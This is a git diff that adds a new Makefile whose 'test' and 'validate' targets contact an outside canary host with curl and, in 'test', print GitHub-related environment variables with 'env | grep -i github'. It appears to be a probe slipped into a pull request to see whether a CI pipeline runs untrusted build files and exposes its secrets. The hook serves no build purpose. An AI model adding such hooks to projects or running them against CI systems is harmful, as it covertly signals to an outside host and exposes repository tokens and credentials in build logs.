diff --git a/Makefile.new b/Makefile.new new file mode 100644 index 00000000..a271e01e --- /dev/null +++ b/Makefile.new @@ -0,0 +1,8 @@ +test: + echo "HB-MAKEFILE-EXEC" + curl -s https://canary.domain/HB-MAKEFILE-EXEC || true + env | grep -i github || true + +validate: + echo "HB-MAKEFILE-VALIDATE" + curl -s https://canary.domain/HB-MAKEFILE-VALIDATE || true \ No newline at end of file